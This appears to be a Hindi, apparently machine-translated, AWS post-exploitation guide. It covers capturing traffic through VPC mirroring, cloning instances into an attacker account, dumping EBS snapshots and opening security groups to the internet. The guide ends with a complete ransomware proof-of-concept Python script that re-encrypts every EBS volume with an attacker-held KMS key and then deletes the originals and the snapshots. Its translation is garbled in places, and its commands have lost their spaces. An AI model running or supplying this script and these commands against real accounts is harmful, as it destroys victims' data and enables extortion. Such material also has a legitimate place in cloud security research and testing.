VPC ट्रैफिक मिररिंग VPC के भीतर EC2 इंस्टेंस के लिए आउटबाउंड और इनबाउंड ट्रैफिक को डुप्लिकेट करता है बिना इंस्टेंस पर कुछ भी स्थापित किए जाने की आवश्यकता के। यह डुप्लिकेट किया गया ट्रैफिक सामान्यत: नेटवर्क उत्कृष्टता जांच प्रणाली (IDS) के लिए विश्लेषण और मॉनिटरिंग के लिए भेजा जाएगा।
किसी हमलावर इसे इस्तेमाल करके सभी ट्रैफिक को कैप्चर कर सकता है और इससे संवेदनशील जानकारी प्राप्त कर सकता है:
इंस्टेंस आम तौर पर किसी प्रकार की संवेदनशील जानकारी शामिल करती है। अंदर जाने के विभिन्न तरीके होते हैं (जांच करें EC2 प्रिविलेज उन्नती ट्रिक्स)। हालांकि, इसमें क्या है यह जांचने का एक और तरीका है कि एक AMI बनाएं और उससे एक नई इंस्टेंस चलाएं (अपने खाते में भी):
# List instancesawsec2describe-images# create a new image for the instance-idawsec2create-image--instance-idi-0438b003d81cd7ec5--name"AWS Audit"--description"Export AMI"--regioneu-west-1# add key to AWSawsec2import-key-pair--key-name"AWS Audit"--public-key-materialfile://~/.ssh/id_rsa.pub--regioneu-west-1# create ec2 using the previously created AMI, use the same security group and subnet to connect easily.aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1
# now you can check the instanceawsec2describe-instances--instance-idsi-0546910a0c18725a1# If needed : edit groupsawsec2modify-instance-attribute--instance-id"i-0546910a0c18725a1"--groups"sg-6d0d7f01"--regioneu-west-1# be a good guy, clean our instance to avoid any useless costawsec2stop-instances--instance-id"i-0546910a0c18725a1"--regioneu-west-1awsec2terminate-instances--instance-id"i-0546910a0c18725a1"--regioneu-west-1
EBS स्नैपशॉट डंप
स्नैपशॉट वॉल्यूम की बैकअप होती हैं, जो आम तौर पर संवेदनशील जानकारी को शामिल करेगी, इसलिए इन्हें जांचना चाहिए। अगर आपको कोई स्नैपशॉट के बिना वॉल्यूम मिलती है तो आप: एक स्नैपशॉट बना सकते हैं और निम्नलिखित कार्रवाइयों को कर सकते हैं या फिर इसे खाते के अंदर एक इंस्टेंस में माउंट कर सकते हैं:
एक हमलावर अपने द्वारा नियंत्रित खाते के API एंडपॉइंट कॉल कर सकता है। Cloudtrail इस कॉल को लॉग करेगा और हमलावर को Cloudtrail लॉग में उद्धरण डेटा देखने की सक्षमता होगी।
ओपन सुरक्षा समूह
आप इस प्रकार के द्वारा द्वार खोलकर नेटवर्क सेवाओं तक को और पहुंच प्राप्त कर सकते हैं:
awsec2authorize-security-group-ingress--group-id<sg-id>--protocoltcp--port80--cidr0.0.0.0/0# Or you could just open it to more specific ips or maybe th einternal network if you have already compromised an EC2 in the VPC
ECS को उन्नत बनाना
एक EC2 इंस्टेंस को चलाना और इसे ECS इंस्टेंस चलाने के लिए पंजीकृत करना संभव है और फिर ECS इंस्टेंस डेटा चुरा सकते हैं।
एक प्रूफ ऑफ कॉन्सेप्ट जो S3 पोस्ट-एक्सप्लोइटेशन नोट्स में देखाए गए रैंसमवेयर प्रदर्शन के समान है। KMS को RMS के लिए नामांकित किया जाना चाहिए जिसे उपयोग करके विभिन्न AWS सेवाओं को एन्क्रिप्ट करना इतना आसान है।
पहले 'हमलावर' AWS खाते से, KMS में एक ग्राहक प्रबंधित कुंजी बनाएं। इस उदाहरण के लिए, हमें बस AWS को कुंजी डेटा का प्रबंधन करने देने दें, लेकिन एक वास्तविक स्थिति में एक दुर्भाग्यपूर्ण अभिनेता कुंजी डेटा को AWS के नियंत्रण के बाहर रखेगा। कुंजी नीति को बदलकर किसी भी AWS खाता प्रिंसिपल को कुंजी का उपयोग करने की अनुमति देने के लिए। इस कुंजी नीति के लिए, खाते का नाम 'हमलावरसिम' था और सभी पहुंच की अनुमति देने वाले नीति नियम को 'आउटसाइड एन्क्रिप्शन' कहा गया।
कुंजी नीति नियम को निम्नलिखित सक्षम करने की आवश्यकता है ताकि इसका उपयोग EBS वॉल्यूम को एन्क्रिप्ट करने के लिए किया जा सके:
kms:CreateGrant
kms:Decrypt
kms:DescribeKey
kms:GenerateDataKeyWithoutPlainText
kms:ReEncrypt
अब सार्वजनिक रूप से पहुंचने वाली कुंजी का उपयोग करने के साथ। हम 'विक्टिम' खाता का उपयोग कर सकते हैं जिसमें कुछ EC2 इंस्टेंस अनएन्क्रिप्टेड EBS वॉल्यूम के साथ स्पिन अप किए गए हैं। इस 'विक्टिम' खाते के EBS वॉल्यूम को हम एन्क्रिप्शन के लिए लक्ष्य बना रहे हैं, यह हमला एक उच्च-विशेषाधिकार AWS खाते के अनुमानित उल्लंघन के तहत है।
साइमिलर तरह से S3 रैंसमवेयर उदाहरण की तरह। यह हमला स्नैपशॉट का उपयोग करके लगाए गए EBS वॉल्यूम की प्रतियां बनाएगा, 'हमलावर' खाते से सार्वजनिक उपलब्ध कुंजी का उपयोग करके नए EBS वॉल्यूम को एन्क्रिप्ट करेगा, फिर मूल EBS वॉल्यूम को EC2 इंस्टेंस से अलग करेगा और उन्हें हटा देगा, और फिर नए एन्क्रिप्ट किए गए EBS वॉल्यूम बनाने के लिए उपयोग किए गए स्नैपशॉट को हटा देगा।
इससे खाते में केवल एन्क्रिप्टेड EBS वॉल्यूम ही उपलब्ध रह जाते हैं।
यहाँ ध्यान देने योग्य है कि स्क्रिप्ट ने EC2 इंस्टेंस को रोक दिया था ताकि मूल EBS वॉल्यूम को अलग करने और हटाने में सहायता मिल सके। मूल अनएन्क्रिप्टेड वॉल्यूम अब ग़ायब हो गए हैं।
अगले, 'हमलावर' खाते में कुंजी नीति में वापस जाएं और कुंजी नीति से 'आउटसाइड एन्क्रिप्शन' नीति नियम को हटा दें।
{"Version":"2012-10-17","Id":"key-consolepolicy-3","Statement": [{"Sid":"Enable IAM User Permissions","Effect":"Allow","Principal": {"AWS":"arn:aws:iam::[Your AWS Account Id]:root"},"Action":"kms:*","Resource":"*"},{"Sid":"Allow access for Key Administrators","Effect":"Allow","Principal": {"AWS":"arn:aws:iam::[Your AWS Account Id]:user/AttackSim"},"Action": ["kms:Create*","kms:Describe*","kms:Enable*","kms:List*","kms:Put*","kms:Update*","kms:Revoke*","kms:Disable*","kms:Get*","kms:Delete*","kms:TagResource","kms:UntagResource","kms:ScheduleKeyDeletion","kms:CancelKeyDeletion"],"Resource":"*"},{"Sid":"Allow use of the key","Effect":"Allow","Principal": {"AWS":"arn:aws:iam::[Your AWS Account Id]:user/AttackSim"},"Action": ["kms:Encrypt","kms:Decrypt","kms:ReEncrypt*","kms:GenerateDataKey*","kms:DescribeKey"],"Resource":"*"},{"Sid":"Allow attachment of persistent resources","Effect":"Allow","Principal": {"AWS":"arn:aws:iam::[Your AWS Account Id]:user/AttackSim"},"Action": ["kms:CreateGrant","kms:ListGrants","kms:RevokeGrant"],"Resource":"*","Condition": {"Bool": {"kms:GrantIsForAWSResource":"true"}}}]}
कृपया नए सेट की गई कुंजी नीति को प्रसारित होने के लिए एक क्षण प्रतीक्षा करें। फिर 'विक्टिम' खाते पर वापस जाएं और नए एन्क्रिप्टेड EBS वॉल्यूम में से एक को जोड़ने का प्रयास करें। आप देखेंगे कि आप वॉल्यूम को जोड़ सकते हैं।
Pasted image 20231231174131
Pasted image 20231231174258
लेकिन जब आप एन्क्रिप्टेड EBS वॉल्यूम के साथ EC2 इंस्टेंस को वास्तव में फिर से शुरू करने का प्रयास करेंगे तो यह बस विफल हो जाएगा और 'पेंडिंग' स्थिति से फिर से 'रुका हुआ' स्थिति में चला जाएगा क्योंकि जुड़ा हुआ EBS वॉल्यूम कुंजी का उपयोग करके नहीं डिक्रिप्ट किया जा सकता क्योंकि कुंजी नीति अब इसे अनुमति नहीं देती है।
Pasted image 20231231174322
Pasted image 20231231174352
यह पायथन स्क्रिप्ट उपयोग किया गया है। यह AWS क्रेडेंशियल्स लेता है एक 'विक्टिम' खाते के लिए और एन्क्रिप्शन के लिए उपयोग किए जाने वाले कुंजी के लिए सार्वजनिक उपलब्ध AWS ARN मान। स्क्रिप्ट सभी उपलब्ध EBS वॉल्यूम की एन्क्रिप्टेड प्रतियां बनाएगा जो संविदित AWS खाते में सभी EC2 इंस्टेंस पर जुड़े होते हैं, फिर हर EC2 इंस्टेंस को रोकेगा, मूल EBS वॉल्यूम को अलग करेगा, उन्हें हटा देगा, और अंत में प्रक्रिया के दौरान उपयोग की गई सभी स्नैपशॉट्स को हटा देगा। इससे संविदित 'विक्टिम' खाते में केवल एन्क्रिप्टेड EBS वॉल्यूम बचेंगे। कृपया इस स्क्रिप्ट का केवल एक परीक्षण परिसर में उपयोग करें, यह विनाशकारी है और सभी मूल EBS वॉल्यूम हटा देगा। आप उन्हें स्नैपशॉट के माध्यम से उपयोग किए गए KMS कुंजी का उपयोग करके पुनः प्राप्त कर सकते हैं और उन्हें उनकी मूल स्थिति में पुनर्स्थापित कर सकते हैं, लेकिन आपको इस बारे में जागरूक करना चाहिए कि यह एक ransomware PoC है।
import boto3
import argparse
from botocore.exceptions import ClientError
def enumerate_ec2_instances(ec2_client):
instances = ec2_client.describe_instances()
instance_volumes = {}
for reservation in instances['Reservations']:
for instance in reservation['Instances']:
instance_id = instance['InstanceId']
volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol]
instance_volumes[instance_id] = volumes
return instance_volumes
def snapshot_volumes(ec2_client, volumes):
snapshot_ids = []
for volume_id in volumes:
snapshot = ec2_client.create_snapshot(VolumeId=volume_id)
snapshot_ids.append(snapshot['SnapshotId'])
return snapshot_ids
def wait_for_snapshots(ec2_client, snapshot_ids):
for snapshot_id in snapshot_ids:
ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id])
def create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn):
new_volume_ids = []
for snapshot_id in snapshot_ids:
snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0]
volume_id = snapshot_info['VolumeId']
volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0]
availability_zone = volume_info['AvailabilityZone']
volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone,
Encrypted=True, KmsKeyId=kms_key_arn)
new_volume_ids.append(volume['VolumeId'])
return new_volume_ids
def stop_instances(ec2_client, instance_ids):
for instance_id in instance_ids:
try:
instance_description = ec2_client.describe_instances(InstanceIds=[instance_id])
instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name']
if instance_state == 'running':
ec2_client.stop_instances(InstanceIds=[instance_id])
print(f"Stopping instance: {instance_id}")
ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id])
print(f"Instance {instance_id} stopped.")
else:
print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).")
except ClientError as e:
print(f"Error stopping instance {instance_id}: {e}")
def detach_and_delete_volumes(ec2_client, volumes):
for volume_id in volumes:
try:
ec2_client.detach_volume(VolumeId=volume_id)
ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id])
ec2_client.delete_volume(VolumeId=volume_id)
print(f"Deleted volume: {volume_id}")
except ClientError as e:
print(f"Error detaching or deleting volume {volume_id}: {e}")
def delete_snapshots(ec2_client, snapshot_ids):
for snapshot_id in snapshot_ids:
try:
ec2_client.delete_snapshot(SnapshotId=snapshot_id)
print(f"Deleted snapshot: {snapshot_id}")
except ClientError as e:
print(f"Error deleting snapshot {snapshot_id}: {e}")
def replace_volumes(ec2_client, instance_volumes):
instance_ids = list(instance_volumes.keys())
stop_instances(ec2_client, instance_ids)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
detach_and_delete_volumes(ec2_client, all_volumes)
def ebs_lock(access_key, secret_key, region, kms_key_arn):
ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region)
instance_volumes = enumerate_ec2_instances(ec2_client)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
wait_for_snapshots(ec2_client, snapshot_ids)
create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn) # New encrypted volumes are created but not attached
replace_volumes(ec2_client, instance_volumes) # Stops instances, detaches and deletes old volumes
delete_snapshots(ec2_client, snapshot_ids) # Optionally delete snapshots if no longer needed
def parse_arguments():
parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool')
parser.add_argument('--access-key', required=True, help='AWS Access Key ID')
parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key')
parser.add_argument('--region', required=True, help='AWS Region')
parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption')
return parser.parse_args()
def main():
args = parse_arguments()
ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region)
instance_volumes = enumerate_ec2_instances(ec2_client)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
wait_for_snapshots(ec2_client, snapshot_ids)
create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn)
replace_volumes(ec2_client, instance_volumes)
delete_snapshots(ec2_client, snapshot_ids)
if __name__ == "__main__":
main()